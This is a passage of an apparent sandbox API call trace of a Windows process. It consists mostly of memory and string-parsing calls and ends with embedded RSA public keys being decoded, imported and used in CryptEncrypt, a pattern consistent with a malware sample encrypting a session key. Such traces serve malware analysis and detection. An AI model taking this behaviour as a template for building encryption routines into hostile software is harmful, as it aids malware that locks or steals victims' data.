0x3f651e0 [0144.031] free (_Block=0x0) [0144.031] free (_Block=0x0) [0144.031] memchr (_Buf=0x3f6872b, _Val=10, _MaxCount=0x1e0) returned 0x3f68767 [0144.031] malloc (_Size=0x3d) returned 0x3e22350 [0144.032] free (_Block=0x0) [0144.032] free (_Block=0x0) [0144.032] memchr (_Buf=0x3f68768, _Val=10, _MaxCount=0x1a3) returned 0x3f687a3 [0144.032] malloc (_Size=0x3c) returned 0x3e22788 [0144.032] free (_Block=0x0) [0144.032] free (_Block=0x0) [0144.032] memchr (_Buf=0x3f687a4, _Val=10, _MaxCount=0x167) returned 0x3f687ae [0144.032] malloc (_Size=0xb) returned 0x3648d10 [0144.032] free (_Block=0x0) [0144.032] free (_Block=0x0) [0144.032] memchr (_Buf=0x3f687af, _Val=10, _MaxCount=0x15c) returned 0x3f68818 [0144.032] malloc (_Size=0x6a) returned 0x60b740 [0144.032] free (_Block=0x0) [0144.032] free (_Block=0x0) [0144.032] memchr (_Buf=0x3f68819, _Val=10, _MaxCount=0xf2) returned 0x3f68829 [0144.032] malloc (_Size=0x11) returned 0x3f65280 [0144.032] free (_Block=0x0) [0144.032] free (_Block=0x0) [0144.032] memchr (_Buf=0x3f6882a, _Val=10, _MaxCount=0xe1) returned 0x3f68843 [0144.033] malloc (_Size=0x1a) returned 0x3d802d8 [0144.033] free (_Block=0x0) [0144.033] free (_Block=0x0) [0144.033] memchr (_Buf=0x3f68844, _Val=10, _MaxCount=0xc7) returned 0x3f68884 [0144.033] malloc (_Size=0x41) returned 0x60eaa8 [0144.033] free (_Block=0x0) [0144.033] free (_Block=0x0) [0144.033] memchr (_Buf=0x3f68885, _Val=10, _MaxCount=0x86) returned 0x3f688c5 [0144.033] malloc (_Size=0x41) returned 0x60ea08 [0144.033] free (_Block=0x0) [0144.033] free (_Block=0x0) [0144.033] memchr (_Buf=0x3f688c6, _Val=10, _MaxCount=0x45) returned 0x3f688f2 [0144.033] malloc (_Size=0x2d) returned 0x3624a68 [0144.033] free (_Block=0x0) [0144.033] free (_Block=0x0) [0144.033] memchr (_Buf=0x3f688f3, _Val=10, _MaxCount=0x18) returned 0x3f6890a [0144.033] malloc (_Size=0x18) returned 0x3f653c0 [0144.033] free (_Block=0x0) [0144.033] free (_Block=0x0) [0144.033] free (_Block=0x3f68010) [0144.034] memchr (_Buf=0x3624ad8, _Val=32, _MaxCount=0x28) returned 0x3624ade [0144.034] malloc (_Size=0x7) returned 0x3f4bff8 [0144.034] free (_Block=0x0) [0144.034] malloc (_Size=0x40) returned 0x3e22500 [0144.034] free (_Block=0x0) [0144.034] free (_Block=0x0) [0144.034] memchr (_Buf=0x3624adf, _Val=32, _MaxCount=0x21) returned 0x3624aea [0144.034] malloc (_Size=0xc) returned 0x3648d28 [0144.034] free (_Block=0x0) [0144.034] free (_Block=0x0) [0144.034] memchr (_Buf=0x3624aeb, _Val=32, _MaxCount=0x15) returned 0x3624af7 [0144.034] malloc (_Size=0xd) returned 0x3648ce0 [0144.034] free (_Block=0x0) [0144.034] free (_Block=0x0) [0144.034] memchr (_Buf=0x3624af8, _Val=32, _MaxCount=0x8) returned 0x3624afc [0144.034] malloc (_Size=0x5) returned 0x3f4c018 [0144.034] free (_Block=0x0) [0144.034] free (_Block=0x0) [0144.034] memchr (_Buf=0x3624afd, _Val=32, _MaxCount=0x3) returned 0x3624afe [0144.034] malloc (_Size=0x2) returned 0x3f4c0f8 [0144.034] free (_Block=0x0) [0144.034] malloc (_Size=0x140) returned 0x3dd43b8 [0144.034] free (_Block=0x3e22500) [0144.034] free (_Block=0x0) [0144.034] memchr (_Buf=0x3624aff, _Val=32, _MaxCount=0x1) returned 0x0 [0144.035] malloc (_Size=0x2) returned 0x3f4c078 [0144.035] free (_Block=0x0) [0144.035] free (_Block=0x0) [0144.035] free (_Block=0x3f4bff8) [0144.035] free (_Block=0x3648d28) [0144.035] free (_Block=0x3648ce0) [0144.035] free (_Block=0x3f4c018) [0144.035] free (_Block=0x3f4c0f8) [0144.035] free (_Block=0x3f4c078) [0144.035] free (_Block=0x3dd43b8) [0144.035] memchr (_Buf=0x3f652c0, _Val=32, _MaxCount=0x10) returned 0x0 [0144.035] malloc (_Size=0x11) returned 0x3f65340 [0144.035] free (_Block=0x0) [0144.035] malloc (_Size=0x40) returned 0x3e22500 [0144.035] free (_Block=0x0) [0144.035] free (_Block=0x0) [0144.035] free (_Block=0x3f65340) [0144.035] free (_Block=0x3e22500) [0144.035] memchr (_Buf=0x3d803a0, _Val=32, _MaxCount=0x1c) returned 0x3d803aa [0144.035] malloc (_Size=0xb) returned 0x3648e30 [0144.035] free (_Block=0x0) [0144.035] malloc (_Size=0x40) returned 0x3e22620 [0144.036] free (_Block=0x0) [0144.036] free (_Block=0x0) [0144.036] memchr (_Buf=0x3d803ab, _Val=32, _MaxCount=0x11) returned 0x3d803b2 [0144.036] malloc (_Size=0x8) returned 0x3f4bf18 [0144.036] free (_Block=0x0) [0144.036] free (_Block=0x0) [0144.036] memchr (_Buf=0x3d803b3, _Val=32, _MaxCount=0x9) returned 0x0 [0144.036] malloc (_Size=0xa) returned 0x3648d40 [0144.036] free (_Block=0x0) [0144.036] free (_Block=0x0) [0144.036] free (_Block=0x3648e30) [0144.036] free (_Block=0x3f4bf18) [0144.036] free (_Block=0x3648d40) [0144.036] free (_Block=0x3e22620) [0144.036] memchr (_Buf=0x60eb98, _Val=32, _MaxCount=0x40) returned 0x0 [0144.038] malloc (_Size=0x41) returned 0x60ed78 [0144.038] free (_Block=0x0) [0144.038] malloc (_Size=0x40) returned 0x3e22590 [0144.038] free (_Block=0x0) [0144.038] free (_Block=0x0) [0144.038] free (_Block=0x60ed78) [0144.038] free (_Block=0x3e22590) [0144.038] memchr (_Buf=0x60ecd8, _Val=32, _MaxCount=0x40) returned 0x0 [0144.038] malloc (_Size=0x41) returned 0x60e828 [0144.038] free (_Block=0x0) [0144.038] malloc (_Size=0x40) returned 0x3e22398 [0144.038] free (_Block=0x0) [0144.038] free (_Block=0x0) [0144.038] free (_Block=0x60e828) [0144.038] free (_Block=0x3e22398) [0144.038] memchr (_Buf=0x3e22548, _Val=32, _MaxCount=0x3c) returned 0x0 [0144.038] malloc (_Size=0x3d) returned 0x3e226f8 [0144.038] free (_Block=0x0) [0144.038] malloc (_Size=0x40) returned 0x3e22230 [0144.039] free (_Block=0x0) [0144.039] free (_Block=0x0) [0144.039] free (_Block=0x3e226f8) [0144.039] free (_Block=0x3e22230) [0144.039] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x1a) returned 0x3d800b0 [0144.039] malloc (_Size=0x9) returned 0x3648e30 [0144.039] free (_Block=0x0) [0144.039] malloc (_Size=0x40) returned 0x3e222c0 [0144.039] free (_Block=0x0) [0144.039] free (_Block=0x0) [0144.039] memchr (_Buf=0x3d800b1, _Val=32, _MaxCount=0x11) returned 0x3d800b8 [0144.039] malloc (_Size=0x8) returned 0x3f4bf88 [0144.039] free (_Block=0x0) [0144.039] free (_Block=0x0) [0144.039] memchr (_Buf=0x3d800b9, _Val=32, _MaxCount=0x9) returned 0x0 [0144.039] malloc (_Size=0xa) returned 0x3648c80 [0144.039] free (_Block=0x0) [0144.039] free (_Block=0x0) [0144.039] free (_Block=0x3648e30) [0144.039] free (_Block=0x3f4bf88) [0144.039] free (_Block=0x3648c80) [0144.040] free (_Block=0x3e222c0) [0144.040] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3e) returned 0x3e22482 [0144.040] malloc (_Size=0x13) returned 0x3f654c0 [0144.040] free (_Block=0x0) [0144.040] malloc (_Size=0x40) returned 0x3e227d0 [0144.040] free (_Block=0x0) [0144.040] free (_Block=0x0) [0144.040] memchr (_Buf=0x3e22483, _Val=32, _MaxCount=0x2b) returned 0x0 [0144.040] malloc (_Size=0x2c) returned 0x3624aa0 [0144.040] free (_Block=0x0) [0144.040] free (_Block=0x0) [0144.040] free (_Block=0x3f654c0) [0144.040] free (_Block=0x3624aa0) [0144.040] free (_Block=0x3e227d0) [0144.040] memchr (_Buf=0x60ddc8, _Val=32, _MaxCount=0x26) returned 0x60ddd2 [0144.040] malloc (_Size=0xb) returned 0x3648da0 [0144.040] free (_Block=0x0) [0144.040] malloc (_Size=0x40) returned 0x3e226f8 [0144.040] free (_Block=0x0) [0144.040] free (_Block=0x0) [0144.041] memchr (_Buf=0x60ddd3, _Val=32, _MaxCount=0x1b) returned 0x0 [0144.041] malloc (_Size=0x1c) returned 0x3d80198 [0144.041] free (_Block=0x0) [0144.041] free (_Block=0x0) [0144.041] free (_Block=0x3648da0) [0144.041] free (_Block=0x3d80198) [0144.041] free (_Block=0x3e226f8) [0144.041] memchr (_Buf=0x3d801c0, _Val=32, _MaxCount=0x1e) returned 0x3d801c8 [0144.041] malloc (_Size=0x9) returned 0x3648da0 [0144.041] free (_Block=0x0) [0144.041] malloc (_Size=0x40) returned 0x3e22668 [0144.041] free (_Block=0x0) [0144.041] free (_Block=0x0) [0144.041] memchr (_Buf=0x3d801c9, _Val=32, _MaxCount=0x15) returned 0x3d801cc [0144.041] malloc (_Size=0x4) returned 0x3f4c008 [0144.041] free (_Block=0x0) [0144.041] free (_Block=0x0) [0144.041] memchr (_Buf=0x3d801cd, _Val=32, _MaxCount=0x11) returned 0x3d801d5 [0144.041] malloc (_Size=0x9) returned 0x3648ce0 [0144.042] free (_Block=0x0) [0144.042] free (_Block=0x0) [0144.042] memchr (_Buf=0x3d801d6, _Val=32, _MaxCount=0x8) returned 0x3d801d8 [0144.042] malloc (_Size=0x3) returned 0x3f4c0c8 [0144.042] free (_Block=0x0) [0144.042] free (_Block=0x0) [0144.042] memchr (_Buf=0x3d801d9, _Val=32, _MaxCount=0x5) returned 0x0 [0144.042] malloc (_Size=0x6) returned 0x3f4bf78 [0144.042] free (_Block=0x0) [0144.042] malloc (_Size=0x140) returned 0x3dd3e98 [0144.042] free (_Block=0x3e22668) [0144.042] free (_Block=0x0) [0144.042] free (_Block=0x3648da0) [0144.042] free (_Block=0x3f4c008) [0144.042] free (_Block=0x3648ce0) [0144.042] free (_Block=0x3f4c0c8) [0144.042] free (_Block=0x3f4bf78) [0144.042] free (_Block=0x3dd3e98) [0144.042] memchr (_Buf=0x3d66e30, _Val=32, _MaxCount=0x73) returned 0x3d66e35 [0144.042] malloc (_Size=0x6) returned 0x3f4c038 [0144.042] free (_Block=0x0) [0144.042] malloc (_Size=0x40) returned 0x3e22080 [0144.043] free (_Block=0x0) [0144.043] free (_Block=0x0) [0144.043] memchr (_Buf=0x3d66e36, _Val=32, _MaxCount=0x6d) returned 0x3d66e3e [0144.043] malloc (_Size=0x9) returned 0x3648da0 [0144.043] free (_Block=0x0) [0144.043] free (_Block=0x0) [0144.043] memchr (_Buf=0x3d66e3f, _Val=32, _MaxCount=0x64) returned 0x3d66e47 [0144.043] malloc (_Size=0x9) returned 0x3648ce0 [0144.043] free (_Block=0x0) [0144.043] free (_Block=0x0) [0144.043] memchr (_Buf=0x3d66e48, _Val=32, _MaxCount=0x5b) returned 0x3d66e54 [0144.043] malloc (_Size=0xd) returned 0x3648db8 [0144.043] free (_Block=0x0) [0144.043] free (_Block=0x0) [0144.043] memchr (_Buf=0x3d66e55, _Val=32, _MaxCount=0x4e) returned 0x3d66e5e [0144.043] malloc (_Size=0xa) returned 0x3648cf8 [0144.043] free (_Block=0x0) [0144.043] malloc (_Size=0x140) returned 0x3dd3d50 [0144.044] free (_Block=0x3e22080) [0144.044] free (_Block=0x0) [0144.044] memchr (_Buf=0x3d66e5f, _Val=32, _MaxCount=0x44) returned 0x3d66e6a [0144.044] malloc (_Size=0xc) returned 0x3648de8 [0144.044] free (_Block=0x0) [0144.044] free (_Block=0x0) [0144.044] memchr (_Buf=0x3d66e6b, _Val=32, _MaxCount=0x38) returned 0x3d66e75 [0144.044] malloc (_Size=0xb) returned 0x3648e30 [0144.044] free (_Block=0x0) [0144.044] free (_Block=0x0) [0144.044] memchr (_Buf=0x3d66e76, _Val=32, _MaxCount=0x2d) returned 0x3d66e7e [0144.044] malloc (_Size=0x9) returned 0x3648d40 [0144.044] free (_Block=0x0) [0144.044] free (_Block=0x0) [0144.044] memchr (_Buf=0x3d66e7f, _Val=32, _MaxCount=0x24) returned 0x3d66e8b [0144.044] malloc (_Size=0xd) returned 0x3648e48 [0144.044] free (_Block=0x0) [0144.044] free (_Block=0x0) [0144.044] memchr (_Buf=0x3d66e8c, _Val=32, _MaxCount=0x17) returned 0x3d66e99 [0144.044] malloc (_Size=0xe) returned 0x3648e00 [0144.045] free (_Block=0x0) [0144.045] free (_Block=0x0) [0144.045] memchr (_Buf=0x3d66e9a, _Val=32, _MaxCount=0x9) returned 0x0 [0144.045] malloc (_Size=0xa) returned 0x3648ea8 [0144.045] free (_Block=0x0) [0144.045] free (_Block=0x0) [0144.045] free (_Block=0x3f4c038) [0144.045] free (_Block=0x3648da0) [0144.045] free (_Block=0x3648ce0) [0144.045] free (_Block=0x3648db8) [0144.045] free (_Block=0x3648cf8) [0144.045] free (_Block=0x3648de8) [0144.045] free (_Block=0x3648e30) [0144.045] free (_Block=0x3648d40) [0144.045] free (_Block=0x3648e48) [0144.045] free (_Block=0x3648e00) [0144.045] free (_Block=0x3648ea8) [0144.045] free (_Block=0x3dd3d50) [0144.045] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1d) returned 0x3d80241 [0144.045] malloc (_Size=0xa) returned 0x3648c68 [0144.045] free (_Block=0x0) [0144.045] malloc (_Size=0x40) returned 0x3e22080 [0144.045] free (_Block=0x0) [0144.046] free (_Block=0x0) [0144.046] memchr (_Buf=0x3d80242, _Val=32, _MaxCount=0x13) returned 0x3d8024c [0144.046] malloc (_Size=0xb) returned 0x3648ce0 [0144.046] free (_Block=0x0) [0144.046] free (_Block=0x0) [0144.046] memchr (_Buf=0x3d8024d, _Val=32, _MaxCount=0x8) returned 0x0 [0144.046] malloc (_Size=0x9) returned 0x3648d28 [0144.046] free (_Block=0x0) [0144.046] free (_Block=0x0) [0144.046] free (_Block=0x3648c68) [0144.046] free (_Block=0x3648ce0) [0144.046] free (_Block=0x3648d28) [0144.046] free (_Block=0x3e22080) [0144.046] memchr (_Buf=0x3e224b8, _Val=32, _MaxCount=0x3d) returned 0x3e224c3 [0144.046] malloc (_Size=0xc) returned 0x3648ea8 [0144.046] free (_Block=0x0) [0144.046] malloc (_Size=0x40) returned 0x3e22110 [0144.046] free (_Block=0x0) [0144.046] free (_Block=0x0) [0144.047] memchr (_Buf=0x3e224c4, _Val=32, _MaxCount=0x31) returned 0x3e224c8 [0144.047] malloc (_Size=0x5) returned 0x3f4bfe8 [0144.047] free (_Block=0x0) [0144.047] free (_Block=0x0) [0144.047] memchr (_Buf=0x3e224c9, _Val=32, _MaxCount=0x2c) returned 0x3e224cd [0144.047] malloc (_Size=0x5) returned 0x3f4c0c8 [0144.047] free (_Block=0x0) [0144.047] free (_Block=0x0) [0144.047] memchr (_Buf=0x3e224ce, _Val=32, _MaxCount=0x27) returned 0x3e224d2 [0144.047] malloc (_Size=0x5) returned 0x3f4c048 [0144.047] free (_Block=0x0) [0144.047] free (_Block=0x0) [0144.047] memchr (_Buf=0x3e224d3, _Val=32, _MaxCount=0x22) returned 0x3e224d7 [0144.047] malloc (_Size=0x5) returned 0x3f4bf38 [0144.047] free (_Block=0x0) [0144.047] malloc (_Size=0x140) returned 0x3dd4500 [0144.047] free (_Block=0x3e22110) [0144.047] free (_Block=0x0) [0144.047] memchr (_Buf=0x3e224d8, _Val=32, _MaxCount=0x1d) returned 0x3e224dc [0144.048] malloc (_Size=0x5) returned 0x3f4c038 [0144.048] free (_Block=0x0) [0144.048] free (_Block=0x0) [0144.048] memchr (_Buf=0x3e224dd, _Val=32, _MaxCount=0x18) returned 0x3e224e1 [0144.048] malloc (_Size=0x5) returned 0x3f4bf48 [0144.048] free (_Block=0x0) [0144.048] free (_Block=0x0) [0144.048] memchr (_Buf=0x3e224e2, _Val=32, _MaxCount=0x13) returned 0x3e224e6 [0144.048] malloc (_Size=0x5) returned 0x3f4c058 [0144.048] free (_Block=0x0) [0144.048] free (_Block=0x0) [0144.048] memchr (_Buf=0x3e224e7, _Val=32, _MaxCount=0xe) returned 0x3e224eb [0144.048] malloc (_Size=0x5) returned 0x3f4c0d8 [0144.048] free (_Block=0x0) [0144.048] free (_Block=0x0) [0144.048] memchr (_Buf=0x3e224ec, _Val=32, _MaxCount=0x9) returned 0x3e224f0 [0144.048] malloc (_Size=0x5) returned 0x3f4bf28 [0144.048] free (_Block=0x0) [0144.049] free (_Block=0x0) [0144.049] memchr (_Buf=0x3e224f1, _Val=32, _MaxCount=0x4) returned 0x0 [0144.049] malloc (_Size=0x5) returned 0x3f4bff8 [0144.049] free (_Block=0x0) [0144.049] free (_Block=0x0) [0144.049] free (_Block=0x3648ea8) [0144.049] free (_Block=0x3f4bfe8) [0144.049] free (_Block=0x3f4c0c8) [0144.049] free (_Block=0x3f4c048) [0144.049] free (_Block=0x3f4bf38) [0144.049] free (_Block=0x3f4c038) [0144.049] free (_Block=0x3f4bf48) [0144.049] free (_Block=0x3f4c058) [0144.049] free (_Block=0x3f4c0d8) [0144.049] free (_Block=0x3f4bf28) [0144.049] free (_Block=0x3f4bff8) [0144.049] free (_Block=0x3dd4500) [0144.049] memchr (_Buf=0x3648ec0, _Val=32, _MaxCount=0xf) returned 0x3648ec6 [0144.049] malloc (_Size=0x7) returned 0x3f4bf68 [0144.049] free (_Block=0x0) [0144.049] malloc (_Size=0x40) returned 0x3e22428 [0144.049] free (_Block=0x0) [0144.050] free (_Block=0x0) [0144.050] memchr (_Buf=0x3648ec7, _Val=32, _MaxCount=0x8) returned 0x0 [0144.050] malloc (_Size=0x9) returned 0x3648da0 [0144.050] free (_Block=0x0) [0144.050] free (_Block=0x0) [0144.050] free (_Block=0x3f4bf68) [0144.050] free (_Block=0x3648da0) [0144.050] free (_Block=0x3e22428) [0144.050] memchr (_Buf=0x60dd08, _Val=32, _MaxCount=0x27) returned 0x60dd11 [0144.050] malloc (_Size=0xa) returned 0x3648c50 [0144.050] free (_Block=0x0) [0144.050] malloc (_Size=0x40) returned 0x3e22500 [0144.050] free (_Block=0x0) [0144.050] free (_Block=0x0) [0144.050] memchr (_Buf=0x60dd12, _Val=32, _MaxCount=0x1d) returned 0x60dd1c [0144.050] malloc (_Size=0xb) returned 0x3648c80 [0144.050] free (_Block=0x0) [0144.050] free (_Block=0x0) [0144.050] memchr (_Buf=0x60dd1d, _Val=32, _MaxCount=0x12) returned 0x60dd27 [0144.050] malloc (_Size=0xb) returned 0x3648ea8 [0144.051] free (_Block=0x0) [0144.051] free (_Block=0x0) [0144.051] memchr (_Buf=0x60dd28, _Val=32, _MaxCount=0x7) returned 0x0 [0144.051] malloc (_Size=0x8) returned 0x3f4c098 [0144.051] free (_Block=0x0) [0144.051] free (_Block=0x0) [0144.051] free (_Block=0x3648c50) [0144.051] free (_Block=0x3648c80) [0144.051] free (_Block=0x3648ea8) [0144.051] free (_Block=0x3f4c098) [0144.051] free (_Block=0x3e22500) [0144.051] memchr (_Buf=0x60b150, _Val=32, _MaxCount=0x66) returned 0x60b161 [0144.051] malloc (_Size=0x12) returned 0x3f65380 [0144.051] free (_Block=0x0) [0144.051] malloc (_Size=0x40) returned 0x3e22500 [0144.051] free (_Block=0x0) [0144.051] free (_Block=0x0) [0144.051] memchr (_Buf=0x60b162, _Val=32, _MaxCount=0x54) returned 0x60b18a [0144.051] malloc (_Size=0x29) returned 0x3624b80 [0144.051] free (_Block=0x0) [0144.051] free (_Block=0x0) [0144.052] memchr (_Buf=0x60b18b, _Val=32, _MaxCount=0x2b) returned 0x0 [0144.052] malloc (_Size=0x2c) returned 0x36249c0 [0144.052] free (_Block=0x0) [0144.052] free (_Block=0x0) [0144.052] free (_Block=0x3f65380) [0144.052] free (_Block=0x3624b80) [0144.052] free (_Block=0x36249c0) [0144.052] free (_Block=0x3e22500) [0144.052] memchr (_Buf=0x3648cc8, _Val=32, _MaxCount=0x9) returned 0x0 [0144.052] malloc (_Size=0xa) returned 0x3648ef0 [0144.052] free (_Block=0x0) [0144.052] malloc (_Size=0x40) returned 0x3e22620 [0144.052] free (_Block=0x0) [0144.052] free (_Block=0x0) [0144.052] free (_Block=0x3648ef0) [0144.053] free (_Block=0x3e22620) [0144.053] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1e) returned 0x3d8012a [0144.053] malloc (_Size=0xb) returned 0x3648ce0 [0144.053] free (_Block=0x0) [0144.053] malloc (_Size=0x40) returned 0x3e22500 [0144.053] free (_Block=0x0) [0144.053] free (_Block=0x0) [0144.053] memchr (_Buf=0x3d8012b, _Val=32, _MaxCount=0x13) returned 0x3d8012e [0144.053] malloc (_Size=0x4) returned 0x3f4bf48 [0144.053] free (_Block=0x0) [0144.053] free (_Block=0x0) [0144.053] memchr (_Buf=0x3d8012f, _Val=32, _MaxCount=0xf) returned 0x3d80135 [0144.053] malloc (_Size=0x7) returned 0x3f4c008 [0144.053] free (_Block=0x0) [0144.053] free (_Block=0x0) [0144.053] memchr (_Buf=0x3d80136, _Val=32, _MaxCount=0x8) returned 0x0 [0144.053] malloc (_Size=0x9) returned 0x3648d28 [0144.053] free (_Block=0x0) [0144.053] free (_Block=0x0) [0144.053] free (_Block=0x3648ce0) [0144.054] free (_Block=0x3f4bf48) [0144.054] free (_Block=0x3f4c008) [0144.054] free (_Block=0x3648d28) [0144.054] free (_Block=0x3e22500) [0144.054] memchr (_Buf=0x60e738, _Val=32, _MaxCount=0x40) returned 0x0 [0144.054] malloc (_Size=0x41) returned 0x60eaf8 [0144.054] free (_Block=0x0) [0144.054] malloc (_Size=0x40) returned 0x3e22230 [0144.054] free (_Block=0x0) [0144.054] free (_Block=0x0) [0144.054] malloc (_Size=0x41) returned 0x60ec38 [0144.054] free (_Block=0x0) [0144.054] free (_Block=0x60eaf8) [0144.054] free (_Block=0x3e22230) [0144.054] memchr (_Buf=0x60ee68, _Val=32, _MaxCount=0x40) returned 0x0 [0144.054] malloc (_Size=0x41) returned 0x60eaf8 [0144.055] free (_Block=0x0) [0144.055] malloc (_Size=0x40) returned 0x3e22308 [0144.055] free (_Block=0x0) [0144.055] free (_Block=0x0) [0144.055] malloc (_Size=0x81) returned 0x60c9b0 [0144.055] free (_Block=0x60ec38) [0144.055] free (_Block=0x60eaf8) [0144.055] free (_Block=0x3e22308) [0144.055] memchr (_Buf=0x3e22740, _Val=32, _MaxCount=0x3c) returned 0x0 [0144.055] malloc (_Size=0x3d) returned 0x3e22080 [0144.055] free (_Block=0x0) [0144.055] malloc (_Size=0x40) returned 0x3e22500 [0144.055] free (_Block=0x0) [0144.055] free (_Block=0x0) [0144.055] malloc (_Size=0xc1) returned 0x605a18 [0144.056] free (_Block=0x60c9b0) [0144.056] free (_Block=0x3e22080) [0144.056] free (_Block=0x3e22500) [0144.056] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1c) returned 0x3d801f0 [0144.056] malloc (_Size=0x9) returned 0x3648e78 [0144.056] free (_Block=0x0) [0144.056] malloc (_Size=0x40) returned 0x3e22590 [0144.056] free (_Block=0x0) [0144.056] free (_Block=0x0) [0144.056] memchr (_Buf=0x3d801f1, _Val=32, _MaxCount=0x13) returned 0x3d801f4 [0144.056] malloc (_Size=0x4) returned 0x3f4bfb8 [0144.056] free (_Block=0x0) [0144.056] free (_Block=0x0) [0144.056] memchr (_Buf=0x3d801f5, _Val=32, _MaxCount=0xf) returned 0x3d801fb [0144.056] malloc (_Size=0x7) returned 0x3f4c038 [0144.056] free (_Block=0x0) [0144.056] free (_Block=0x0) [0144.056] memchr (_Buf=0x3d801fc, _Val=32, _MaxCount=0x8) returned 0x0 [0144.056] malloc (_Size=0x9) returned 0x3648db8 [0144.057] free (_Block=0x0) [0144.057] free (_Block=0x0) [0144.057] CryptStringToBinaryA (in: pszString="MIGJAoGBAKPx7W+WVzJW7ToLbS2yaC664AYJbZWI2JoD1YaAlOUyPbgahHO0SJSK62QAGFtWdsTLWw0e9uFxA6Bu4u4ltW9nVAWdIyT/iiWzBF1YUQjovd2FLmewt8ZdlWbkyjBMonORvQpbC2kz4VTf3oKMahgFQLexIdYA8ZX5OAjNVIPZAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.057] malloc (_Size=0x8c) returned 0x6066d8 [0144.057] free (_Block=0x0) [0144.057] CryptStringToBinaryA (in: pszString="MIGJAoGBAKPx7W+WVzJW7ToLbS2yaC664AYJbZWI2JoD1YaAlOUyPbgahHO0SJSK62QAGFtWdsTLWw0e9uFxA6Bu4u4ltW9nVAWdIyT/iiWzBF1YUQjovd2FLmewt8ZdlWbkyjBMonORvQpbC2kz4VTf3oKMahgFQLexIdYA8ZX5OAjNVIPZAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.057] malloc (_Size=0x8c) returned 0x60dc10 [0144.057] free (_Block=0x0) [0144.057] free (_Block=0x0) [0144.057] free (_Block=0x6066d8) [0144.057] free (_Block=0x3648e78) [0144.057] free (_Block=0x3f4bfb8) [0144.057] free (_Block=0x3f4c038) [0144.057] free (_Block=0x3648db8) [0144.057] free (_Block=0x3e22590) [0144.057] memchr (_Buf=0x3648c98, _Val=32, _MaxCount=0xb) returned 0x0 [0144.057] malloc (_Size=0xc) returned 0x3648f20 [0144.057] free (_Block=0x0) [0144.057] malloc (_Size=0x40) returned 0x3e22038 [0144.058] free (_Block=0x0) [0144.058] free (_Block=0x0) [0144.058] free (_Block=0x3648f20) [0144.058] free (_Block=0x3e22038) [0144.058] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x1e) returned 0x3d8035a [0144.058] malloc (_Size=0xb) returned 0x3648da0 [0144.058] free (_Block=0x0) [0144.058] malloc (_Size=0x40) returned 0x3e225d8 [0144.058] free (_Block=0x0) [0144.058] free (_Block=0x0) [0144.058] memchr (_Buf=0x3d8035b, _Val=32, _MaxCount=0x13) returned 0x3d8035e [0144.058] malloc (_Size=0x4) returned 0x3f4bf68 [0144.058] free (_Block=0x0) [0144.058] free (_Block=0x0) [0144.058] memchr (_Buf=0x3d8035f, _Val=32, _MaxCount=0xf) returned 0x3d80365 [0144.058] malloc (_Size=0x7) returned 0x3f4bf88 [0144.058] free (_Block=0x0) [0144.058] free (_Block=0x0) [0144.058] memchr (_Buf=0x3d80366, _Val=32, _MaxCount=0x8) returned 0x0 [0144.058] CryptStringToBinaryA (in: pszString="MIGJAoGBANkQQ5lbt5xJs+wDSmon/e4Bdl9zoiS3D6xkR7YnwAJ4iQJaYq2S/mR/naktZfRnQ91+eLWI/3O0bqgGs/wMGo382Qx1u0f4i+tLe0CAnoe3H8q00hQx4KH2S5tsbc8lBswGSdtvbOOa8gp7UBuixxoXJA0tS6nqg+pVEpKdxQ+rAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.059] CryptStringToBinaryA (in: pszString="MIGJAoGBANkQQ5lbt5xJs+wDSmon/e4Bdl9zoiS3D6xkR7YnwAJ4iQJaYq2S/mR/naktZfRnQ91+eLWI/3O0bqgGs/wMGo382Qx1u0f4i+tLe0CAnoe3H8q00hQx4KH2S5tsbc8lBswGSdtvbOOa8gp7UBuixxoXJA0tS6nqg+pVEpKdxQ+rAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.059] CryptStringToBinaryA (in: pszString="OlTxHmXETtXX/SvDWmris9/p45LWvKrm1BmmSYQRXmo=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.059] CryptStringToBinaryA (in: pszString="OlTxHmXETtXX/SvDWmris9/p45LWvKrm1BmmSYQRXmo=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d80300, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d80300, pcbBinary=0x339f9d8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.059] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648e78 | out: pbBuffer=0x3648e78) returned 1 [0144.059] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x60dc10, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339f994, pcbStructInfo=0x339f96c | out: pvStructInfo=0x339f994, pcbStructInfo=0x339f96c) returned 1 [0144.059] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f994, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339f990 | out: phKey=0x339f990*=0x432978) returned 1 [0144.059] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x60a248*, pdwDataLen=0x339f960*=0x56, 